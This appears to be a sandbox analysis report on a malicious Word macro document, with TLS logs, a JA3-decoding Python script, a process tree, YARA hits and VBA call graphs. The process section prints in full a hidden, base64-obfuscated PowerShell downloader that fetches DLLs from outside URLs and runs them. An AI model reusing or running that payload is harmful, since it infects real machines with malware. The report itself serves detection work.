Mar 16, 2021 14:27:13.133013010 CET | 107.180.2.185 | 443 | 192.168.2.5 | 49722 | CN=calltorepair.com, OU=Domain Control Validated | CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | Mon Dec 07 15:06:34 CET 2020 | Wed Aug 25 01:02:57 CEST 2021 | 771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 3b5074b1b5d032e5620f69f9f700ff0e
    chain certificate: CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | issued by CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | Tue May 03 09:00:00 CEST 2011 | Sat May 03 09:00:00 CEST 2031
Mar 16, 2021 14:27:13.926667929 CET | 107.180.2.185 | 443 | 192.168.2.5 | 49723 | CN=calltorepair.com, OU=Domain Control Validated | CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | Mon Dec 07 15:06:34 CET 2020 | Wed Aug 25 01:02:57 CEST 2021 | 771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 3b5074b1b5d032e5620f69f9f700ff0e
    chain certificate: CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | issued by CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | Tue May 03 09:00:00 CEST 2011 | Sat May 03 09:00:00 CEST 2031
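In the extracted table the JA3 fingerprint string and its digest run together (the string ends with the point-format field ",0" and the 32 hex characters after it are the MD5 digest). The script below is an added example, not part of the Joe Sandbox report: it splits the fingerprint into its five JA3 fields, names the TLS version, extensions, curves and cipher suites from the IANA registry, flags the suites without forward secrecy and the 3DES suite that this client still offers, and recomputes the MD5 so the split can be checked against the digest column. REPORT_JA3 and REPORT_DIGEST are copied from the table; the name tables cover only the identifiers that appear in it.

```python
"""Parse and re-check the JA3 client fingerprint recorded for the calltorepair.com
TLS sessions.  Added example, not part of the Joe Sandbox report.  JA3 is
MD5("version,ciphers,extensions,curves,point_formats") with '-'-joined lists."""
import hashlib

# Copied from the HTTPS Packets table (both sessions to 107.180.2.185:443 carry the same values).
REPORT_JA3 = ("771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-"
              "49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0")
REPORT_DIGEST = "3b5074b1b5d032e5620f69f9f700ff0e"

# IANA names for the identifiers that occur in REPORT_JA3 (not a complete registry).
TLS_VERSIONS = {769: "TLS 1.0", 770: "TLS 1.1", 771: "TLS 1.2", 772: "TLS 1.3"}
CIPHERS = {
    49196: "TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384", 49195: "TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256",
    49200: "TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384", 49199: "TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256",
    159: "TLS_DHE_RSA_WITH_AES_256_GCM_SHA384", 158: "TLS_DHE_RSA_WITH_AES_128_GCM_SHA256",
    49188: "TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384", 49187: "TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256",
    49192: "TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384", 49191: "TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256",
    49162: "TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA", 49161: "TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA",
    49172: "TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA", 49171: "TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA",
    157: "TLS_RSA_WITH_AES_256_GCM_SHA384", 156: "TLS_RSA_WITH_AES_128_GCM_SHA256",
    61: "TLS_RSA_WITH_AES_256_CBC_SHA256", 60: "TLS_RSA_WITH_AES_128_CBC_SHA256",
    53: "TLS_RSA_WITH_AES_256_CBC_SHA", 47: "TLS_RSA_WITH_AES_128_CBC_SHA",
    10: "TLS_RSA_WITH_3DES_EDE_CBC_SHA",
}
EXTENSIONS = {0: "server_name", 10: "supported_groups", 11: "ec_point_formats",
              13: "signature_algorithms", 23: "extended_master_secret",
              35: "session_ticket", 65281: "renegotiation_info"}
CURVES = {23: "secp256r1", 24: "secp384r1", 29: "x25519"}
# Static RSA key exchange (no forward secrecy) and the 3DES suite.
LEGACY_SUITES = (157, 156, 61, 60, 53, 47, 10)


def parse_ja3(ja3):
    """Split a JA3 string into its five fields; list fields are '-'-separated ints."""
    fields = ja3.split(",")
    if len(fields) != 5:
        raise ValueError("JA3 string must have exactly five comma-separated fields")

    def ints(field):
        return [int(x) for x in field.split("-")] if field else []

    return {"version": int(fields[0]), "ciphers": ints(fields[1]),
            "extensions": ints(fields[2]), "curves": ints(fields[3]),
            "point_formats": ints(fields[4])}


def ja3_digest(ja3):
    """JA3 digest = MD5 of the exact fingerprint string (ASCII, no whitespace)."""
    return hashlib.md5(ja3.encode("ascii")).hexdigest()


def describe(ja3, report_digest=REPORT_DIGEST):
    """Human-readable decode of a JA3 string plus a recomputed digest for checking."""
    p = parse_ja3(ja3)
    digest = ja3_digest(ja3)
    return {
        "version": TLS_VERSIONS.get(p["version"], "0x%04x" % p["version"]),
        "cipher_count": len(p["ciphers"]),
        "ciphers": [CIPHERS.get(c, str(c)) for c in p["ciphers"]],
        "extensions": [EXTENSIONS.get(e, str(e)) for e in p["extensions"]],
        "curves": [CURVES.get(c, str(c)) for c in p["curves"]],
        "legacy_ciphers": [CIPHERS.get(c, str(c)) for c in p["ciphers"] if c in LEGACY_SUITES],
        "offers_sni": 0 in p["extensions"],
        "digest": digest,
        "digest_matches_report": digest == report_digest,
    }


if __name__ == "__main__":
    for key, value in describe(REPORT_JA3).items():
        print(key, value)
```

The digest_matches_report flag is the check to run after splitting the fused column by hand: if it is False the string was cut in the wrong place (a stray space or a missing trailing field changes the MD5). The decode itself shows a TLS 1.2 client that still offers seven static-RSA and 3DES suites alongside the ECDHE GCM suites, which is what makes the JA3 digest a usable identifier for this client stack in network detection.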

                                                                                                                        Code Manipulations

                                                                                                                        Statistics

                                                                                                                        CPU Usage

                                                                                                                        Memory Usage

                                                                                                                        High Level Behavior Distribution

                                                                                                                        Behavior

                                                                                                                        System Behavior

General

Start time: 14:26:51
Start date: 16/03/2021
Path: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding
Imagebase: 0x9e0000
File size: 1937688 bytes
MD5 hash: 0B9AB9B9C4DE429473D6450D4297A123
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 14:26:58
Start date: 16/03/2021
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD 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
Imagebase: 0x7ff7bace0000
File size: 273920 bytes
MD5 hash: 4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 14:26:59
Start date: 16/03/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7ecfc0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 14:26:59
Start date: 16/03/2021
Path: C:\Windows\System32\msg.exe
Wow64 process (32bit): false
Commandline: msg user /v Word experienced an error trying to open the file.
Imagebase: 0x7ff7caa60000
File size: 26112 bytes
MD5 hash: EEB395D8DD3C1D6593903BD640687948
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

General

Start time: 14:27:00
Start date: 16/03/2021
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
                                                                                                                        Commandline:POwersheLL -w hidden -ENCOD IAAgACQAYwBWAE4AZwBBAFMAPQAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADAAfQB7ADMAfQB7ADIAfQAiAC0ARgAgACcAWQBTAFQAZQBNAC4ASQAnACwAJwBTACcALAAnAFIAeQAnACwAJwBPAC4ARABpAHIARQBDAFQAbwAnACkAOwAgACAAIABzAGUAdAAtAEkAVABFAE0AIAAoACIAdgBhAHIAaQBhAEIAbABlACIAKwAiADoAbAA2AFUAIgArACIAWQBIACIAKwAiAE4AIgApACAAIAAoAFsAVABZAHAAZQBdACgAIgB7ADUAfQB7ADAAfQB7ADcAfQB7ADQAfQB7ADgAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADEAfQAiAC0ARgAgACcAWQAnACwAJwBHAGUAcgAnACwAJwBFAFAAbwBJACcALAAnAE4AdABtACcALAAnAFQARQBNAC4ATgBlAHQALgBzAGUAJwAsACcAcwAnACwAJwBBAG4AQQAnACwAJwBzACcALAAnAFIAdgBJAGMAJwApACkAOwAgACQAWABkAHoAXwB0AF8AaQA9ACgAJwBBAHUAJwArACgAJwB6ADAAegAnACsAJwBxAHgAJwApACkAOwAkAFAAaQBpADgAbwBlAG4APQAkAEIAMAB4AGsAMAA0AHIAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFYAYQBsADYAcQBhAHgAOwAkAEwAcgBfAGwAcQBuAHcAPQAoACgAJwBQAGsAJwArACcAOQAnACkAKwAoACcAMQAnACsAJwA1AHcAJwApACsAJwBvACcAKQA7ACAAKAAgACAAaQBUAEUATQAgAHYAYQByAEkAQQBCAGwARQA6AEMAdgBuAGcAQQBTACkALgB2AEEAbABVAEUAOgA6ACIAQwBSAEUAQQBUAGUAYABkAGkAYABSAGUAQwB0AE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAnACsAJwAwAH0AWQAnACsAJwA1ACcAKwAnADUAOQBqAHMAdgB7ADAAfQBJAGUAdwBmAG0AeQAzACcAKwAnAHsAJwArACcAMAB9ACcAKQAgACAALQBGAFsAQwBIAGEAUgBdADkAMgApACkAOwAkAE0AXwBkAG4AYgBzADQAPQAoACcAUQAnACsAKAAnAHUAJwArACcAZwBzACcAKQArACgAJwB5AG8AJwArACcAZAAnACkAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAGUAbQAgACgAIgB2AGEAUgBJAGEAQgBMAGUAIgArACIAOgBsADYAdQAiACsAIgBZAEgAIgArACIAbgAiACkAKQAuAHYAYQBMAHUARQA6ADoAIgBzAEUAQwB1AFIAYABJAFQAYAB5AHAAcgBPAFQAYABvAGMATwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAdABoAHEAbQBnAD0AKAAnAEoAJwArACgAJwB6AHoAJwArACcAegA2ACcAKwAnADIAbQAnACkAKQA7ACQAUQBvAGMAeQBfAGIAZwAgAD0AIAAoACgAJwBQAHAAJwArACcAbgBxACcAKQArACcAOQBqACcAKQA7ACQAWgB5ADcAegA3AGgAZAA9ACgAJwBGAGcAJwArACcAMAA0ACcAKwAoACcAYwBjACcAKwAnAGcAJwApACkAOwAkAEUANQBwAGEAbQA0AGUAPQAoACcAVwBpACcAKwAoACcAMAAnACsAJwA4AGoAJwApACsAJwBhAHkAJwApADsA
JABUAHAAZAB1AGUAMwAyAD0AJABIAE8ATQBFACsAKAAoACgAJwBNAFIAUABZACcAKwAnADUANQAnACkAKwAoACcAOQBqACcAKwAnAHMAJwApACsAJwB2ACcAKwAnAE0AJwArACgAJwBSACcAKwAnAFAASQAnACkAKwAnAGUAJwArACgAJwB3AGYAbQAnACsAJwB5ADMAJwApACsAKAAnAE0AUgAnACsAJwBQACcAKQApAC4AIgBSAGUAYABQAEwAYQBDAEUAIgAoACgAJwBNACcAKwAnAFIAUAAnACkALAAnAFwAJwApACkAKwAkAFEAbwBjAHkAXwBiAGcAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFIANgB1AHQAdgB5AGwAPQAoACgAJwBHACcAKwAnAHAAcgAnACkAKwAoACcAcwAnACsAJwA3ADkAJwApACsAJwBqACcAKQA7ACQAWgAxAGYAbQB2AHEAaAA9AE4AYABlAGAAdwAtAE8AQgBKAGUAYABDAFQAIABOAEUAVAAuAHcARQBCAGMAbABJAGUATgB0ADsAJABOAHkANABtAG4AdgB4AD0AKAAoACcAaAAnACsAKAAoACcAdAAnACsAJwB0AHAAOgBxAHEAKQAoACcAKQApACsAKAAoACcAcwAnACsAJwAyACkAKABxAHEAJwApACkAKwAnACkAJwArACgAKAAnACgAJwArACcAcwAyACcAKQApACsAKAAoACcAKQAnACsAJwAoAG8AcAAnACkAKQArACgAJwBoACcAKwAnAGUAbABpACcAKQArACcAYQAnACsAKAAnAHMAYgAnACsAJwByAGUAJwArACcAdwBlAHIAeQAnACsAJwAuACcAKQArACcAYwAnACsAJwBvAG0AJwArACcAcQAnACsAJwBxACcAKwAoACgAJwApACgAJwArACcAcwAyACcAKQApACsAKAAoACcAKQAoAHcAJwArACcAcAAtACcAKQApACsAKAAnAGkAbgAnACsAJwBjACcAKQArACcAbAAnACsAKAAnAHUAJwArACcAZABlACcAKQArACgAKAAnAHMAcQAnACsAJwBxACkAKABzADIAKQAoAGMAaQBBACcAKwAnAGoAJwArACcAYwBnACcAKQApACsAKAAoACcAagBxAHEAKQAoAHMAMgApACgAQABoAHQAdABwACcAKwAnADoAcQAnACsAJwBxACcAKwAnACkAJwApACkAKwAoACgAJwAoAHMAJwArACcAMgApACgAcQBxACcAKwAnACkAJwArACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACgAJwApACkAKwAoACgAJwB0ACcAKwAnAG8AbgBnACcAKwAnAGQAYQBpAGgAYQAnACsAJwBuAG8AaQAuAGMAJwArACcAbwBtAHEAcQApACgAcwAyACcAKQApACsAKAAoACcAKQAnACsAJwAoADgANAA3ADMANAA2ADMAMgA0ACcAKwAnADIAJwArACcAMwAnACsAJwA0ADIAMwA0AHEAJwApACkAKwAoACgAJwBxACkAKABzADIAJwArACcAKQAnACsAJwAoACcAKwAnAHIAcABuAHYAWABtACcAKQApACsAJwBxACcAKwAnAHEAJwArACgAKAAnACkAJwArACcAKABzADIAJwArACcAKQAoAEAAaAB0AHQAcAAnACsAJwA6AHEAcQApACcAKwAnACgAcwAyACkAJwArACcAKABxAHEAJwApACkAKwAoACgAJwApACcAKwAnACgAcwAyACcAKQApACsAJwApACcAKwAoACgAJwAoAGMAJwApACkAKwAoACcAaABlACcAKwAnAHIAawAnACkAKwAnAGEAJwArACcAcwAnACsAKAAnAGgAYwAnACsAJwBoAGEAbgAnACkAKwAoACcAdQAnACsAJwAuAGMAJwApACsAKAAoACcAbwBtACcAKwAnAHEAcQApACgA
cwAnACsAJwAyACkAKAAnACsAJwBaADoAcQBxACcAKwAnACkAJwApACkAKwAoACgAJwAoAHMAMgApACcAKwAnACgANABaAEUAOABxACcAKwAnAHEAJwArACcAKQAoACcAKQApACsAJwBzADIAJwArACcAKQAnACsAKAAoACcAKABAAGgAdAAnACsAJwB0ACcAKwAnAHAAcwA6AHEAJwArACcAcQApACcAKwAnACgAcwAyACcAKQApACsAKAAoACcAKQAoACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzADIAKQAnACsAJwAoAHgAJwApACkAKwAoACcAdQBhAG4AJwArACcAdABoAGkAbgAnACkAKwAoACcAaABzACcAKwAnAGgAbwBwACcAKQArACgAJwAuACcAKwAnAGMAbwBtACcAKQArACgAKAAnAHEAcQAnACsAJwApACgAcwAnACsAJwAyACkAKAAnACkAKQArACgAJwBhAGMAJwArACcAdQByAGEALQAnACkAKwAnAG0AZAAnACsAJwB4ACcAKwAoACcALQBzAG4AYwAnACsAJwBrACcAKQArACgAKAAnADAAcQAnACsAJwBxACkAKAAnACkAKQArACgAKAAnAHMAMgApACgAMgBMACcAKwAnAFUANwAnACsAJwB3ACcAKwAnAHEAcQApACgAJwArACcAcwAyACkAKABAACcAKwAnAGgAdAAnACsAJwB0ACcAKwAnAHAAcwA6ACcAKQApACsAJwBxACcAKwAoACgAJwBxACkAKABzACcAKwAnADIAKQAoAHEAcQApACcAKwAnACgAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAYwAnACkAKQArACgAJwBhACcAKwAnAGwAbAB0AG8AJwApACsAJwByAGUAJwArACcAcAAnACsAKAAoACcAYQBpAHIAJwArACcALgBjACcAKwAnAG8AbQBxAHEAKQAoAHMAJwArACcAMgApACgAYQAnACkAKQArACgAKAAnAHMAcwAnACsAJwBlACcAKwAnAHQAcwBxAHEAKQAnACsAJwAoAHMAMgAnACkAKQArACgAKAAnACkAJwArACcAKAAwADkAJwApACkAKwAoACcAZQByAFoAJwArACcARgBGACcAKQArACcAcQBxACcAKwAoACgAJwApACgAcwAnACsAJwAyACcAKQApACsAKAAoACcAKQAoACcAKwAnAEAAaAAnACkAKQArACgAJwB0AHQAJwArACcAcAAnACkAKwAoACgAJwA6ACcAKwAnAHEAcQAnACsAJwApACgAcwAyACkAJwArACcAKABxAHEAKQAnACsAJwAoAHMAMgApACgAcwBlACcAKQApACsAKAAnAHIAJwArACcAdgBpAGMAaQBvACcAKwAnAHMAJwApACsAJwAuACcAKwAoACcAcwAnACsAJwBlAG0AJwApACsAKAAnAHAAZQByACcAKwAnAHQAaQAuACcAKwAnAGMAbwBtACcAKQArACgAKAAnAHEAJwArACcAcQApACcAKQApACsAKAAnACgAcwAyACcAKwAnACkAJwApACsAKAAoACcAKAB3ACcAKQApACsAKAAoACcAcAAtACcAKwAnAGEAZABtAGkAbgBxAHEAKQAnACsAJwAoAHMAMgAnACsAJwApACgAJwArACcAMgAnACkAKQArACgAKAAnAEkAJwArACcAeQAnACsAJwBaAEUANwBrAHEAcQAnACsAJwApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAoAEAAJwApACkAKwAoACcAaAB0ACcAKwAnAHQAJwApACsAKAAnAHAAcwA6ACcAKwAnAHEAcQAnACkAKwAoACgAJwApACcAKwAnACgAcwAyACcAKQApACsAJwApACcAKwAoACgAJwAoAHEAJwApACkAKwAoACgAJwBxACkAKABzACcAKwAnADIA
KQAnACsAJwAoAGcAaQBhACcAKQApACsAKAAnAHQAbwB0ACcAKwAnADMANgA1ACcAKQArACcALgAnACsAKAAnAGMAbwBtACcAKwAnAHEAJwApACsAKAAoACcAcQApACgAcwAyACcAKwAnACkAJwApACkAKwAoACcAKAAnACsAJwB3ACcAKwAnAHAALQBjAG8AbgB0AGUAbgAnACsAJwB0ACcAKwAnAHEAcQApACgAcwAyACkAJwApACsAKAAoACcAKAB1ACcAKwAnAHAAJwApACkAKwAnAGwAbwAnACsAJwBhACcAKwAoACgAJwBkACcAKwAnAHMAcQBxACkAKAAnACkAKQArACgAKAAnAHMAMgAnACsAJwApACgAMgAnACsAJwAwACcAKQApACsAKAAnADIAMAAnACsAJwBxAHEAJwApACsAKAAoACcAKQAoAHMAJwArACcAMgAnACkAKQArACgAKAAnACkAKABTAHgAJwArACcAcQBxACcAKwAnACkAKABzADIAKQAoACcAKQApACkAKQAuACIAUgBFAFAAbABgAEEAYABjAEUAIgAoACgAKAAoACgAJwBxAHEAJwArACcAKQAnACkAKQArACcAKAAnACsAKAAoACcAcwAyACcAKwAnACkAKAAnACkAKQApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAC8AJwApACwAKAAnAGgAdwAnACsAJwBlACcAKQApAFsAMABdACkALgAiAHMAUABMAGAAaQB0ACIAKAAkAEwAXwBoAHgAcwBpAHUAIAArACAAJABQAGkAaQA4AG8AZQBuACAAKwAgACQATwB3ADQAeABqAGgAYQApADsAJABOADgAZgBoAHQAeAA2AD0AKAAoACcATgAnACsAJwA5ADQAOQAnACkAKwAnAGwAdwAnACsAJwBuACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAUABnAHMAagBoADgAbgAgAGkAbgAgACQATgB5ADQAbQBuAHYAeAAgAHwAIABTAGAATwByAFQALQBvAGIAYABqAGUAYwBUACAAewBHAGAARQBUAC0AYABSAEEAbgBEAG8AbQB9ACkAewB0AHIAeQB7ACQAWgAxAGYAbQB2AHEAaAAuACIAZABvAFcATgBgAGwAbwBBAGQAYABGAGkATABlACIAKAAkAFAAZwBzAGoAaAA4AG4ALAAgACQAVABwAGQAdQBlADMAMgApADsAJABaADUAcgBqADQAYQB1AD0AKAAnAEgAbwAnACsAKAAnAF8AMAA2AHkAJwArACcAaQAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtACcAKwAnAEkAdAAnACsAJwBlAG0AJwApACAAJABUAHAAZAB1AGUAMwAyACkALgAiAGwAZQBuAGAAZwBgAFQASAAiACAALQBnAGUAIAAzADAANwAwADQAKQAgAHsAJgAoACcAcgB1ACcAKwAnAG4AZAAnACsAJwBsAGwAMwAyACcAKQAgACQAVABwAGQAdQBlADMAMgAsACcAIwAxACcALgAiAFQAYABPAFMAdABSAGkAYABOAGcAIgAoACkAOwAkAEgAMABfADQAYgB3ADMAPQAoACgAJwBTACcAKwAnAGQAdgBxACcAKQArACgAJwB3ACcAKwAnADYAOQAnACkAKQA7AGIAcgBlAGEAawA7ACQAVwB5AHEAMQAzAG8AcwA9ACgAJwBTADgAJwArACcAZgB5ACcAKwAoACcAOAB4ACcAKwAnADYAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFQAdQBhAHgAbwBmADkAPQAoACcAUwBlACcAKwAoACcAZAAnACsAJwA5ADAAJwApACsAJwBfAHoAJwApAA==
Imagebase: 0x7ff6ca5e0000
File size: 447488 bytes
MD5 hash: 95000560239032BC68B4C2FDFCDEF913
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.345480292.000001924A410000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.340406464.0000019232AD8000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.340509636.0000019232B22000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.341303023.0000019232EE5000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000003.262229379.000001924A61C000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.337081458.00000192305F5000.00000004.00000040.sdmp, Author: Florian Roth
• Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000003.336047915.000001924A6AB000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.339130346.00000192327E7000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.340312638.0000019232A8D000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.339329271.000001923285D000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.340170127.0000019232A43000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.340568266.0000019232B5B000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.337304488.0000019231EA0000.00000004.00000040.sdmp, Author: Florian Roth
• Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.340038608.00000192329F8000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.340632134.0000019232B85000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.346005102.000001924A6AB000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000003.335945822.000001924A6BB000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.339894658.00000192329AE000.00000004.00000001.sdmp, Author: Florian Roth
Reputation: high

                                                                                                                        Disassembly

                                                                                                                        Code Analysis

                                                                                                                        Call Graph

                                                                                                                        Graph

Call graph (edges recovered from the graph widget; counts are the number of calls):
Document_open -> Vj_abq1qp3rat9wz (Len:1, Create:1, Mid:1, ChrW:1, CreateObject:1)
Vj_abq1qp3rat9wz -> Y94cd7j9wr9jms (x 2)
Y94cd7j9wr9jms -> Mrfzpndjp3s0k

Module: Avi6wp3s89lev

Declaration

Attribute VB_Name = "Avi6wp3s89lev"

Module: Bj7zc5k612ib

Declaration

Attribute VB_Name = "Bj7zc5k612ib"
Attribute VB_Base = "0{53E03B9E-2218-45B6-85A2-C47D984847B8}{DECDBE84-7493-4018-BC88-15CC72351445}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Module: Hiuk_v7ho95scpn0j

Declaration

Attribute VB_Name = "Hiuk_v7ho95scpn0j"
Attribute VB_Base = "0{DCA2A5D6-E131-4DDA-895B-3E9822E93650}{59CEE0E1-26C4-4583-B7FF-9510385F9059}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Module: Hvp1hxwgx78q8fg4

Declaration
Line  Content
1     Attribute VB_Name = "Hvp1hxwgx78q8fg4"
2     Attribute VB_Base = "0{C2BABB20-D2C4-427C-9EDB-4620FFEE0F8C}{14D3B583-866E-4040-A821-3D821B8C0F73}"
3     Attribute VB_GlobalNameSpace = False
4     Attribute VB_Creatable = False
5     Attribute VB_PredeclaredId = True
6     Attribute VB_Exposed = False
7     Attribute VB_TemplateDerived = False
8     Attribute VB_Customizable = False

Module: Ntx3xle2gjt1

Declaration
Line  Content
1     Attribute VB_Name = "Ntx3xle2gjt1"
2     Attribute VB_Base = "1Normal.ThisDocument"
3     Attribute VB_GlobalNameSpace = False
4     Attribute VB_Creatable = False
5     Attribute VB_PredeclaredId = True
6     Attribute VB_Exposed = True
7     Attribute VB_TemplateDerived = True
8     Attribute VB_Customizable = True

Executed Functions
APIs                                                             Meta Information
Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Item
Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open
Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open
Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open
Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open
Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open
Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open
Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open
Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open
Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open
Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open
Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open
Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open
Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Zgw6mqlr7l2u51
Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: ChrW
Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Yp8t40c73pqf9j6
Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: wdKeyS
Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: V0ds16izbsl_xm
Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Eah7s5mir8k6q8
Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open
Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open
Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open
